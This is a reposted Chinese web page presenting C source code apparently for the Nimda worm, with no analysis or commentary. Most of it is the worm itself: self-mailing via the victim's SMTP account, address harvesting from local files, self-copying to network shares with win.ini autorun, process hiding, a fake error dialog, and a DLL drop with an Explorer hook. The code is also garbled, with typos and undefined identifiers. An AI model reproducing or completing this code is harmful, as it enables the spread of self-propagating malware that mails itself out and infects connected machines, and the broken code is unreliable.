Nimda程式設計內幕 (轉)[@more@]

void WIN worm()
long w0rm_ThreadCodeList[ 3] = {
( long) L0calThread,
( long) Rem0teThread,
( long) Thread
} ;

char *StrArray[ 66] = {
szCopyRight,
szFakeMsg,
szSetUp,
szOpenEnumA,
szWNetCloseEnum,
szWNetEnumReA,
szMPR_DLL,
szWINSOCK_DLL,
szWtartup,
szinet_addr,
szgethostbyaddr,
szgethostbyname,
szhtons,
szsocket,
szconnect,
szsend,
szrecv,
szclosesocket,
szWSACleanup,
smtp_str00,
smtp_str01,
smtp_str02,
smtp_str03,
smtp_str06,
smtp_str07,
smtp_str08,
smtp_str09,
smtp_str0B,
smtp_str0C,
smtp_str0D,
smtp_str0E,
smtp_str0F,
smtp_newline,
smtp_separator,
szWindir00,
szWindir01,
szWindir02,
szWindir03,
szWindir04,
szWIN_INI,
szSETUP_EXE,
szSYSTEM_EXE,
szADVAPI_DLL,
szRegOpenKeyExA,
szRegQueryValueExA,
szRegCloseKey,
szAccountManager,
szDefaultMail,
szAccounts,
szSMTPserver,
szSMTP,
szExt00,
szExt01,
szExt02,
szExt03,
szExt04,
szExt05,
szExt06,
sz,
szCute,
szInternetExplorer,
sz,
szMirc,
szRegisterServiceProcess,
szKernel32,
szTempFile
} ;

static HANDLE w0rm_hThreadList[ 3] ;
D w0rm_ThreadIDList[ 3] ;
char szModule[ MAX_PATH] ;
char *Param ;
int count ;
int min_threads ;
int max_threads ;
BOOL re_generation ;

MailDone = FALSE ;

for ( count = 0 ; count < 66 ; count++ ) DecryptStr( StrArray[ count]) ;

GetModuleFileNameA( NULL, szModule, MAX_PATH) ;
Param = szModule ;

while( *Param != 0) Param++ ;

Param -= 5 ;

if (( *Param == 'P') || ( *Param == 'p'))
{
MessageBox( NULL,
szFakeMsg,
szSetUp,
MB_OK | MB_ICONSTOP) ;

re_generation = FALSE ;
max_threads = 1 ;
}
else
{
if ( ( hKERNEL32 = GetModuleHandleA( szKernel32)) != NULL)
{
if ( ( a_RegisterServiceProcess = GetProcAddress( hKERNEL32, szRegisterServiceProcess)) != NULL)
{
a_RegisterServiceProcess ( GetCurrentProcessId(), 1) ;
}
}

re_generation = TRUE ;
max_threads = 3 ;
}

min_threads = 0 ;

do
{
for ( count = min_threads ; count < max_threads ; count++ )
{
w0rm_hThreadList[ count] = CreateThread( NULL,
0,
( LPTHREAD_START_ROUTINE) w0rm_ThreadCodeList[ count],
NULL,
0,
&w0rm_ThreadIDList[ count]) ;
}

for ( count = min_threads ; count < max_threads ; count++ )
{
if ( w0rm_hThreadList[ count] != NULL)
{
WaitForSingle( w0rm_hThreadList[ count], INFINITE) ;
CloseHandle ( w0rm_hThreadList[ count]) ;
}
}

if ( MailDone)
{
GetDirectoryA( szModule, MAX_PATH) ;
strcat( szModule, szWIN_INI) ;
WritePrivateProfileStringA( szWindir00, "run", "", szModule) ;
re_generation = FALSE ;
}

min_threads = 1 ;

if ( re_generation) Sleep( 0x000FFFFF) ;

} while( re_generation) ;

return 0 ;
}

long WINAPI MailThread(long lParam)
{
unsigned int addr ;
struct sockaddr_in server ;
struct hostent *hp ;
WSADATA wsaData ;

HANDLE hFile ;
HANDLE hMap ;

char enc0de_filename[ MAX_PATH] ;
char ShortBuff[ 512] ;
char szSIGN[ 512] ;
char szHELO[ 512] ;

BOOL Success ;
void *lpFile ;

int StrCount ;
int FileSize ;

typedef struct
{
char *Command ;
BOOL WaitReply ;
}
SMTPstr ;

SMTPstr SMTPstrings00[ 2] = { szHELO, TRUE ,
szMAIL_FROM, TRUE } ;

SMTPstr SMTPstrings01[ 11] = { smtp_str03, TRUE ,
szMAIL_FROM+5, FALSE ,
smtp_str06, FALSE ,
smtp_str07, FALSE ,
smtp_separator, FALSE ,
smtp_str08, FALSE ,
smtp_separator, FALSE ,
smtp_str09, FALSE ,
szSIGN, FALSE ,
smtp_separator, FALSE ,
smtp_str0B, FALSE } ;

SMTPstr SMTPstrings02[ 6] = { smtp_str0C, FALSE ,
smtp_separator, FALSE ,
smtp_str0D, FALSE ,
smtp_newline, FALSE ,
smtp_str0E, TRUE,
smtp_str0F, FALSE } ;
WaitC0nnected() ;

if ( !GetSMTP( szSMTPname, szSMTPaddr)) return 0 ;

sprintf( szHELO, "%s %sn", smtp_str00, szSMTPname) ;
sprintf( szMAIL_FROM, "%s n", smtp_str01, szSMTPaddr) ;
sprintf( szSIGN,"n:)nn----n%snn--", szSMTPaddr) ;

if ( ( hWINSOCK = LoadLibraryA( szWINSOCK_DLL)) == NULL) return 0 ;

a_WSAStartup = ( FROC) GetProcAddress( hWINSOCK, szWSAStartup) ;
a_inet_addr = ( FARPROC) GetProcAddress( hWINSOCK, szinet_addr) ;
a_gethostbyaddr = ( FARPROC) GetProcAddress( hWINSOCK, szgethostbyaddr) ;
a_gethostbyname = ( FARPROC) GetProcAddress( hWINSOCK, szgethostbyname) ;
a_htons = ( FARPROC) GetProcAddress( hWINSOCK, szhtons) ;
a_socket = ( FARPROC) GetProcAddress( hWINSOCK, szsocket) ;
a_connect = ( FARPROC) GetProcAddress( hWINSOCK, szconnect) ;
a_send = ( FARPROC) GetProcAddress( hWINSOCK, szsend) ;
a_recv = ( FARPROC) GetProcAddress( hWINSOCK, szrecv) ;
a_closesocket = ( FARPROC) GetProcAddress( hWINSOCK, szclosesocket) ;
a_WSACleanup = ( FARPROC) GetProcAddress( hWINSOCK, szWSACleanup) ;

if ( ( a_WSAStartup == NULL) ||
( a_inet_addr == NULL) ||
( a_gethostbyaddr == NULL) ||
( a_gethostbyname == NULL) ||
( a_htons == NULL) ||
( a_socket == NULL) ||
( a_connect == NULL) ||
( a_send == NULL) ||
( a_recv == NULL) ||
( a_closesocket == NULL) ||
( a_WSACleanup == NULL))
{
FreeLibrary( hWINSOCK) ;
return 0 ;
}

if ( a_WSAStartup( 0x0001, &wsaData) == SOCKET_ERROR)
{
FreeLibrary( hWINSOCK) ;
return 0 ;
}

if ( isalpha( ( int) szSMTPserver[ 0]))
{
hp = ( struct hostent *) a_gethostbyname( szSMTPname) ;
}
else
{
addr = a_inet_addr( szSMTPname) ;
hp = ( struct hostent *) a_gethostbyaddr( (char *)&addr, 4, AF_INET) ;
}

if ( hp == NULL)
{
a_WSACleanup() ;
FreeLibrary( hWINSOCK) ;
return 0 ;
}

memset( &server, 0, sizeof( server)) ;
memcpy( &server.sin_addr, hp->h_addr, hp->h_length) ;
server.sin_family = hp->h_addrtype ;
server.sin_port = a_htons( 25) ;

conn_socket = a_socket( AF_INET, SOCK_STREAM, 0) ;

if ( conn_socket < 0 )
{
a_WSACleanup() ;
FreeLibrary( hWINSOCK) ;
return 0 ;
}

if ( a_connect( conn_socket, (struct sockaddr *) &server, sizeof( server)) == SOCKET_ERROR)
{
a_closesocket( conn_socket) ;
a_WSACleanup() ;
FreeLibrary( hWINSOCK) ;
}

a_recv( conn_socket, ShortBuff, sizeof ( ShortBuff),0 ) ;

for ( StrCount = 0 ; StrCount < 2 ; StrCount++ )
{
Success = str2socket( SMTPstrings00[ StrCount].Command, SMTPstrings00[ StrCount].WaitReply) ;
if ( !Success) break ;
}

if ( Success)
{
Found = 0 ;

GetWindowsDirectoryA( enc0de_filename, MAX_PATH) ;
enc0de_filename[ 3] = 0 ;

FindPe0ple( enc0de_filename) ;

for ( StrCount = 0 ; StrCount < 11 ; StrCount++ )
{
Success = str2socket( SMTPstrings01[ StrCount].Command, SMTPstrings01[ StrCount].WaitReply) ;
if ( !Success) break ;
}

if ( Success)
{
GetModuleFileNameA( NULL, ShortBuff, MAX_PATH) ;
GetTempPathA( MAX_PATH, enc0de_filename) ;
strcat( enc0de_filename, szTempFile) ;

if ( CopyFileA( ShortBuff, enc0de_filename, FALSE) != 0)
{
if ( ( hFile = CreateFileA( enc0de_filename,
GENERIC_READ,
FILE_SHARE_READ,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL)) != INVALID_HANDLE_VALUE)
{
FileSize = GetFileSize( hFile, NULL) ;

if ( ( FileSize != 0xFFFFFFFF) && ( FileSize != 0))
{
if ( ( hMap = CreateFileMapA( hFile,
NULL,
PAGE_READONLY | PAGE_WRITECOPY,
0,
FileSize,
NULL)) != NULL)
{
if ( ( lpFile = MapViewOfFile( hMap,
FILE_MAP_READ,
0,
0,
FileSize)) != NULL)
{
base64_encode( lpFile, FileSize) ;

for ( StrCount = 0 ; StrCount < 6 ; StrCount++ )
{
if ( ( Success = str2socket( SMTPstrings02[ StrCount].Command,
SMTPstrings02[ StrCount].WaitReply)) == FALSE) break ;
}

if ( Success) MailDone = TRUE ;

UnmapViewOfFile( lpFile) ;
}

CloseHandle( hMap) ;
}
}

CloseHandle( hFile) ;
}

DeleteFileA( enc0de_filename) ;
}
}
}

a_closesocket( conn_socket) ;
a_WSACleanup() ;
FreeLibrary( hWINSOCK) ;

return 0 ;
}

//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?

void NetW0ng( LPNETRESOURCE lpnr)
{
LPNETRESOURCE lpnrLocal ;
HANDLE hEnum ;
int count ;
int cEntries = 0xFFFFFFFF ;
DWORD dwResult ;
DWORD cbBuffer = 32768 ;

if ( a_WNetOpenEnum ( RESOURCE_CONNECTED,
RESOURCETYPE_ANY,
0,
lpnr,
&hEnum) != NO_ERROR) return ;
do
{
lpnrLocal = ( LPNETRESOURCE) GlobalAlloc( GPTR, cbBuffer) ;

dwResult = a_WNetEnumResource( hEnum,
&cEntries,
lpnrLocal,
&cbBuffer) ;
if ( dwResult == NO_ERROR)
{
for ( count = 1 ; count < cEntries ; count++ )
{
if ( lpnrLocal[ count].dwUsage & RESOURCEUSAGE_CONTAINER)
{
NetW0rming( &lpnrLocal[ count]) ;
}
else if ( lpnrLocal[ count].dwType = RESOURCETYPE_DISK)
{
Rem0teInfecti0n( lpnrLocal[ count].lpRemoteName) ;
}
}
}
else if (dwResult != ERROR_NO_MORE_ITEMS) break ;

} while ( dwResult != ERROR_NO_MORE_ITEMS) ;

GlobalFree ( ( HGLOBAL) lpnrLocal) ;

a_WNetCloseEnum( hEnum) ;

return ;
}

//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?

void Rem0teInfecti0n( char *szPath)
{
char *dir_name[ 5]= { szWindir00, szWindir01, szWindir02, szWindir03, szWindir04 } ;
_FIND_DATAA FindData ;
HANDLE hFind ;
char szLookUp[ MAX_PATH] ;
char w0rm0rg[ MAX_PATH] ;
char w0rmD3st[ MAX_PATH] ;
int aux ;

for ( aux = 0 ; aux < 5 ; aux++ )
{
sprintf ( szLookUp, "%s%s%s", szPath, dir_name[ aux], szWIN_INI) ;
if ( ( hFind = FindFirstFileA( szLookUp, ( LPWIN32_FIND_DATAA) &FindData)) != INVALID_HANDLE_VALUE)
{
sprintf( w0rmD3st, "%s%s%s", szPath, dir_name[ aux], szSYSTEM_EXE) ;

if ( GetModuleFileNameA( NULL, w0rm0rg, MAX_PATH) != 0)
{
if ( CopyFileA( w0rm0rg, w0rmD3st, TRUE) != 0)
{
WritePrivateProfileStringA( szWindir00, "run", szSYSTEM_EXE, szLookUp) ;
FindClose ( hFind) ;
break ;
}
}

FindClose ( hFind) ;
}
}
}

//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?

BOOL str2socket( char *msg, BOOL do_recv)
{
int retval ;
char Buffer[ 256];

/* Code used to de the wo

if ( do_recv)
{
if ( MessageBox( NULL,
msg,
"send() this string ?",
MB_YESNO | MB_ICONQUESTION) == IDNO) return TRUE ;
}
*/

if ( a_send( conn_socket, msg, strlen( msg), 0) == SOCKET_ERROR)
{
a_WSACleanup() ;
return FALSE ;
}

if ( do_recv)
{
retval = a_recv( conn_socket, Buffer, sizeof ( Buffer),0 ) ;
if ( ( retval == SOCKET_ERROR) || ( retval == 0))
{
a_closesocket( conn_socket) ;
a_WSACleanup() ;
return FALSE ;
}

Buffer[ retval] = 0 ;

/* Code used to debug the worm

MessageBox( NULL,
Buffer,
"recv()",
MB_OK | MB_ICONSTOP) ;
*/
}

return TRUE ;
}

//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?

BOOL GetSMTP( char *dest, char *org_email)
{
char szKeyName[ MAX_PATH] ;
char szRes[ MAX_PATH] ;
char *move2low ;
int size ;
HKEY hKey ;

if ( ( hADVAPI = LoadLibraryA( szADVAPI_DLL)) == NULL) return FALSE ;

a_RegOpenKeyExA = ( FARPROC) GetProcAddress( hADVAPI, szRegOpenKeyExA) ;
a_RegQueryValueExA = ( FARPROC) GetProcAddress( hADVAPI, szRegQueryValueExA) ;
a_RegCloseKey = ( FARPROC) GetProcAddress( hADVAPI, szRegCloseKey) ;

if ( ( a_RegOpenKeyExA == NULL) ||
( a_RegQueryValueExA == NULL) ||
( a_RegCloseKey == NULL))
{
FreeLibrary( hADVAPI) ;
return FALSE ;
}

strcpy( szKeyName, szAccountManager) ;

if ( a_RegOpenKeyExA( HKEY_CURRENT_USER,
szKeyName,
0,
KEY_QUERY_VALUE,
&hKey) != ERROR_SUCCESS)
{
FreeLibrary( hADVAPI) ;
return FALSE ;
}

size = 64 ;

if ( a_RegQueryValueExA( hKey,
szDefaultMail,
0,
NULL,
szRes,
&size) != ERROR_SUCCESS)
{
a_RegCloseKey( hKey) ;
FreeLibrary( hADVAPI) ;
return FALSE ;
}

a_RegCloseKey( hKey) ;

strcat( szKeyName, szAccounts) ;
strcat( szKeyName, szRes) ;

if ( a_RegOpenKeyExA( HKEY_CURRENT_USER,
szKeyName,
0,
KEY_QUERY_VALUE,
&hKey) != ERROR_SUCCESS)
{
FreeLibrary( hADVAPI) ;
return FALSE ;
}

size = 64 ;

if ( a_RegQueryValueExA( hKey,
szSMTPserver,
0,
NULL,
dest,
&size) != ERROR_SUCCESS)
{
a_RegCloseKey( hKey) ;
FreeLibrary( hADVAPI) ;
return FALSE ;
}

size = 64 ;

if ( a_RegQueryValueExA( hKey,
szSMTPemail,
0,
NULL,
org_email,
&size) != ERROR_SUCCESS)
{
a_RegCloseKey( hKey) ;
FreeLibrary( hADVAPI) ;
return FALSE ;
}

a_RegCloseKey( hKey) ;

move2low = org_email ;

while( *move2low != 0)
{
if ( ( *move2low > 64) && ( *move2low < 91)) *move2low = ( char) (* move2low) - 65 + 97 ;
move2low++ ;
}

FreeLibrary( hADVAPI) ;
return TRUE ;
}

//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?

void base64_encode(const void *buf, int size)
{
char base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" ;

char ok_base64[ 80] ;
char *p = ok_base64 ;
unsigned char *q = ( unsigned char *) buf ;
int i ;
int c ;
int l ;
BOOL SendRes ;

i = l = 0 ;

while( i < size)
{
c = q[ i++] ;
c *= 256 ;

if( i < size) c += q[ i] ;

i++ ;
c *= 256 ;

if( i < size) c += q[ i] ;

i++ ;

p[ 0] = base64[ ( c & 0x00fc0000) >> 18] ;
p[ 1] = base64[ ( c & 0x0003f000) >> 12] ;
p[ 2] = base64[ ( c & 0x00000fc0) >> 6] ;
p[ 3] = base64[ ( c & 0x0000003f) >> 0] ;

if( i > size) p[ 3] = '=' ;

if( i > size + 1) p[ 2] = '=' ;

p += 4 ;

l += 1 ;

if ( l == 0x013)
{
ok_base64[ 0x04C] = 0x0A ;
ok_base64[ 0x04D] = 0 ;

if ( ( SendRes = str2socket( ok_base64, FALSE)) == FALSE) break ;

p = ok_base64 ;
l = 0;
}
}

if ( SendRes != FALSE)
{
if ( l != 0)
{
ok_base64[ l*4] = 0x0A ;
ok_base64[ l*4] = 0 ;

str2socket( ok_base64, FALSE) ;
}
}
}

//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?

char *DecryptStr( char *DcrStr)
{
char *p= DcrStr ;

while( *pos != 0)
{
*pos ^= ( char) 0x0FF ;
pos++ ;
}

return DcrStr ;
}

//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?

void FindPe0ple( char *szPath)
{
char szRecursive[ MAX_PATH] ;
char szCurrentDir[ MAX_PATH] ;
char FileExt[ MAX_PATH] ;
char RCPT_TO[ MAX_PATH] ;
WIN32_FIND_DATAA FindData ;
HANDLE hFind ;
HANDLE hFile ;
HANDLE hMap ;
void *lpFile ;
char *lpc01 ;
char *lpc02 ;
char *lpc03 ;
char *lpc04 ;
char auxchar ;
int l00king ;
int addrssize ;

GetCurrentDirectoryA( MAX_PATH, szCurrentDir) ;

if ( SetCurrentDirectoryA( szPath) == FALSE) return ;

hFind = (HANDLE) FindFirstFileA( "*.*", (LPWIN32_FIND_DATAA) &FindData) ;
if ( hFind != INVALID_HANDLE_VALUE)
{
do
{
if ( ( FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && ( FindData.cFileName[0] != '.'))
{
strcpy (szRecursive,szPath) ;
strcat (szRecursive,FindData.cFileName) ;
strcat (szRecursive,"") ;

FindPe0ple( szRecursive) ;
}
else if ( ( FindData.nFileSizeHigh == 0) && ( FindData.nFileSizeLow > 16) && ( !( FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && ( FindData.cFileName[0] != '.')))
{
lpc01 = FindData.cFileName ;
lpc02 = NULL ;

while ( *lpc01 != 0)
{
if ( *lpc01 == 46) lpc02 = lpc01 ;
lpc01++ ;
}

lpc01 = FileExt ;

if ( lpc02 != NULL)
{
while ( *lpc02 != 0)
{
if ( ( *lpc02 > 97) && ( *lpc02 < 123)) *lpc01 = ( char) ( *lpc02 - 97 + 65) ;
else *lpc01 = *lpc02 ;

lpc01++ ;
lpc02++ ;
}

FileExt[ 4] = 0 ;

if ( ( strcmp( FileExt, szExt00) == 0) ||
( strcmp( FileExt, szExt01) == 0) ||
( strcmp( FileExt, szExt02) == 0) ||
( strcmp( FileExt, szExt03) == 0) ||
( strcmp( FileExt, szExt04) == 0) ||
( strcmp( FileExt, szExt05) == 0) ||
( strcmp( FileExt, szExt06) == 0))
{
if ( ( hFile = CreateFileA( FindData.cFileName,
GENERIC_READ,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL)) != INVALID_HANDLE_VALUE)
{
if ( ( hMap = CreateFileMappingA( hFile,
NULL,
PAGE_READONLY,
0,
FindData.nFileSizeLow,
NULL)) != NULL)
{
if ( ( lpFile = MapViewOfFile( hMap,
FILE_MAP_READ,
0,
0,
FindData.nFileSizeLow)) != NULL)
{
lpc01 = lpFile ;
addrssize = FindData.nFileSizeLow ;
l00king = 0 ;

while( ( addrssize > 16) && ( Found < 16))
{
if ( *lpc01 == 60)
{
l00king = 1 ;
lpc02 = lpc01 ;
}

if ( ( *lpc01 == 64) && ( l00king == 1))
{
l00king = 2 ;
}

if ( ( *lpc01 == 62) && ( l00king == 2))
{
lpc03 = szSMTPaddr ;
lpc04 = lpc02 + 1 ;

while ( *lpc03 != 0)
{
auxchar = *lpc04 ;

if ( ( auxchar > 64) && ( auxchar < 91)) auxchar = auxchar - 65 + 97 ;

if ( *lpc03 != auxchar)
{
l00king = 0 ;
break ;
}

lpc03++ ;
lpc04++ ;
}

if ( l00king == 0)
{
strcpy( RCPT_TO, smtp_str02) ;
lpc03 = RCPT_TO + 9 ;
while ( *lpc02 != 62)
{
*lpc03 = *lpc02 ;
lpc02++ ;
lpc03++ ;
}
*lpc03 = 62 ;
lpc03++ ;
*lpc03 = 0 ;

strcat( RCPT_TO, "n") ;

str2socket( RCPT_TO, TRUE) ;

Found++ ;
}
else l00king = 0 ;
}

if ( ( *lpc01 < 64) &&
( *lpc01 != 46) &&
( *lpc01 != 60) &&
( *lpc01 != 62))
{
l00king = 0 ;
}

if ( *lpc01 > 122)
{
l00king = 0 ;
}

lpc01++ ;
addrssize-- ;
}

UnmapViewOfFile( lpFile) ;
}

CloseHandle( hMap) ;
}

CloseHandle( hFile) ;
}
}
}
}
}
while ( ( FindNextFile( hFind, &FindData) !=0) && ( Found < 16)) ;

FindClose( hFind) ;
}

return ;
}

//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?

void WaitC0nnected( void)
{
InetActivated = FALSE ;

while ( !InetActivated)
{
EnumWindows( EnumWindowsProc, ( LPARAM) NULL) ;

Sleep( 0x01770) ;
}

return ;
}

//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?

BOOL CALLBACK EnumWindowsProc( HWND hwnd, LPARAM lParam)
{

int CaptionLen ;
int AwareLen ;
int CompareLen ;
int InetAware ;
int EquChar ;
int aux0 ;
int aux1 ;
char *Foll0w ;
char *PtrAware ;
char WindowCaption[ 1024] ;

CaptionLen = GetWindowText( hwnd, WindowCaption, 1024) ;

if ( CaptionLen > 0)
{
Foll0w = WindowCaption ;

while( *Foll0w != 0)
{
if ( ( *Foll0w >= 'a') && ( *Foll0w <= 'z')) *Foll0w = *Foll0w - 'a' + 'A' ;
Foll0w++ ;
}

for(Aware = 0 ; InetAware < 5 ; InetAware++)
{
AwareLen = strlen( szAware[ InetAware]) ;

if ( AwareLen < CaptionLen)
{
CompareLen = CaptionLen - AwareLen ;

for ( aux0 = 0 ; aux0 < CompareLen ; aux0++ )
{
EquChar = 0 ;
Foll0w = &WindowCaption[ aux0] ;
PtrAware = szAware[ InetAware] ;

for ( aux1 = 0 ; aux1 < AwareLen ; aux1++ , Foll0w++ , PtrAware++ )
{
if ( *Foll0w == *PtrAware) EquChar++ ;
}

if ( EquChar == AwareLen)
{
InetActivated = TRUE ;
break ;
}

aux0++ ;
}
}
}
}

return ( !InetActivated) ;
}
void TFTP32()
{
HANDLE hFile=CreateFile("TFTP32.DLL",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
//printf("nCreate file %s failed:%d",RemoteFilePath,GetLastError());
return -1
}
//寫內容
DWORD i=0,dwIndex=0,dwWrite,dwSize=sizeof(tftpdllbuff)
while(dwSize>dwIndex)
{
if(!WriteFile(hFile,&tftpdllbuff[dwIndex],dwSize-dwIndex,&dwWrite,NULL))
{
//printf("nWrite file %s failed:%d","TFTP32.DLL",GetLastError());
return -1
}
dwIndex+=dwWrite;
}
//關閉檔案控制程式碼
CloseHandle(hFile);

hhook hk
STARTUPINFO si;
PROCESS_INFORMATION pi;

memset(&si,0,sizeof(si));
si.hStdError = si.hStdOutput = wp1;
si.hStdInput = rp2;
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.wShowWindow = SW_H;
si.lpReserved=0;
si.lpReserved2=0;
si.cbReserved2 =0;
si.cb = sizeof(si);
//this two must not
CreateProcess(0, "Explorer.exe", 0, 0, 1, 0, 0, 0, &si, &pi)

Hookproc hkprc
static HINSTANCE hinstDLL
hinstDLL=LoadLibrary((LPCTSTR)"TFTP32.DLL")
hkprc=(HOOKPROC)GetProcAddress(hinstDLL,"hook")
hk=SetWindowsHookEx(WH_CBT,hkprc,HinstDLL,pi.wdthreadID)
FreeLibrary(hinstDLL)
}

Nimda程式設計內幕 (轉)

相關文章